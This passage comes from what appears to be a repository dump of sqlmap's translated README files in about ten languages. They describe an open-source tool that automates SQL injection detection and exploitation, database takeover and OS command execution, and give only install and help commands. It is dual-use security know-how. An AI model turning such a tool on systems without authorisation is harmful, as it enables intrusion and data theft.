Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nAnda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.\n\nInstalasi\n----\n\nAnda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nSebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun.\n\nPenggunaan\n----\n\nUntuk mendapatkan daftar opsi dasar gunakan:\n\n    python sqlmap.py -h\n\nUntuk mendapatkan daftar opsi lanjut gunakan:\n\n    python sqlmap.py -hh\n\nAnda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).\nUntuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nTautan\n----\n\n* Situs: https://sqlmap.org\n* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues\n* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki\n* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)\n* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-it-IT.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.\n\nScreenshot\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nNella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma.\n\nInstallazione\n----\n\nPuoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nLa cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma.\n\nUtilizzo\n----\n\nPer una lista delle opzioni e dei controlli di base:\n\n    python sqlmap.py -h\n\nPer una lista di tutte le opzioni e di tutti i controlli:\n\n    python sqlmap.py -hh\n\nPuoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601).\nPer una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese).\n\nLink\n----\n\n* Sito: https://sqlmap.org\n* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki\n* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-ja-JP.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。\n強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。\n\nスクリーンショット\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nwikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots)\n\nインストール\n----\n\n最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。\n\n[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。\n\n使用方法\n----\n\n基本的なオプションとスイッチの使用方法をリストで取得するには:\n\n    python sqlmap.py -h\n\n全てのオプションとスイッチの使用方法をリストで取得するには:\n\n    python sqlmap.py -hh\n\n実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。\nsqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。\n\nリンク\n----\n\n* ホームページ: https://sqlmap.org\n* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* 課題管理: https://github.com/sqlmapproject/sqlmap/issues\n* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki\n* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-ka-GE.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.\n\nეკრანის ანაბეჭდები\n----\n\n![ეკრანის ანაბეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nშეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.\n\nინსტალაცია\n----\n\nთქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.\n\nასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.\n\nგამოყენება\n----\n\nძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:\n\n    python sqlmap.py -h\n\nვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:\n\n    python sqlmap.py -hh\n\nგამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nბმულები\n----\n\n* საწყისი გვერდი: https://sqlmap.org\n* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues\n* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki\n* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-ko-KR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다.\n\n스크린샷\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\n또는, wiki에 나와있는 몇몇 기능을 보여주는 [스크린샷 모음](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 을 방문하실 수 있습니다.\n\n설치\n----\n\n[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 클릭하여 최신 버전의 tarball 파일, 또는 [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 클릭하여 최신 zipball 파일을 다운받으실 수 있습니다.\n\n가장 선호되는 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmap을 다운로드 할 수 있습니다:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다.\n\n사용법\n----\n\n기본 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:\n\n    python sqlmap.py -h\n\n전체 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:\n\n    python sqlmap.py -hh\n\n[여기](https://asciinema.org/a/46601)를 통해 사용 샘플들을 확인할 수 있습니다.\nsqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록을 예제와 함께 보려면, [사용자 매뉴얼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)을 참고하시길 권장드립니다.\n\n링크\n----\n\n* 홈페이지: https://sqlmap.org\n* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n* 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki\n* 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* 트위터: [@sqlmap](https://twitter.com/sqlmap)\n* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-nl-NL.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen.\n\nScreenshots\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nJe kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki.\n\nInstallatie\n----\n\nJe kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken.\n\nBij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**.\n\nGebruik\n----\n\nOm een lijst van basisopties en switches te krijgen gebruik:\n\n    python sqlmap.py -h\n\nOm een lijst van alle opties en switches te krijgen gebruik:\n\n    python sqlmap.py -hh\n\nJe kunt [hier](https://asciinema.org/a/46601) een proefrun vinden.\nVoor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen.\n\nLinks\n----\n\n* Homepage: https://sqlmap.org\n* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues\n* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki\n* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-pl-PL.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalających na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.\n\nZrzuty ekranowe\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nMożesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości.\n\nInstalacja\n----\n\nNajnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nMożna również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\ndo użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej.\n\nSposób użycia\n----\n\nAby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:\n\n    python sqlmap.py -h\n\nAby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:\n\n    python sqlmap.py -hh\n\nPrzykładowy wynik działania dostępny jest [tutaj](https://asciinema.org/a/46601).\nAby uzyskać listę wszystkich dostępnych funkcji, parametrów i opisów ich działania wraz z przykładami użycia sqlmap proponujemy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nOdnośniki\n----\n\n* Strona projektu: https://sqlmap.org\n* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues\n* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki\n* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-pt-BR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.\n\nImagens\n----\n\n![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nVocê pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.\n\nInstalação\n----\n\nVocê pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nDe preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas.\n\nComo usar\n----\n\nPara obter uma lista das opções básicas faça:\n\n    python sqlmap.py -h\n\nPara obter a lista completa de opções faça:\n\n    python sqlmap.py -hh\n\nVocê pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601).\nPara ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).\n\nLinks\n----\n\n* Homepage: https://sqlmap.org\n* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki\n* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos)\n* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-rs-RS.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. \"out-of-band\" veza.\n\nSlike\n----\n\n![Slika](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nMožete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama.\n\nInstalacija\n----\n\nMožete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nOpciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.\n\nKorišćenje\n----\n\nKako biste dobili listu osnovnih opcija i prekidača koristite:\n\n    python sqlmap.py -h\n\nKako biste dobili listu svih opcija i prekidača koristite:\n\n    python sqlmap.py -hh\n\nMožete pronaći primer izvršavanja [ovde](https://asciinema.org/a/46601).\nKako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidača, zajedno s primerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nLinkovi\n----\n\n* Početna stranica: https://sqlmap.org\n* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues\n* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki\n* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-ru-RUS.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band 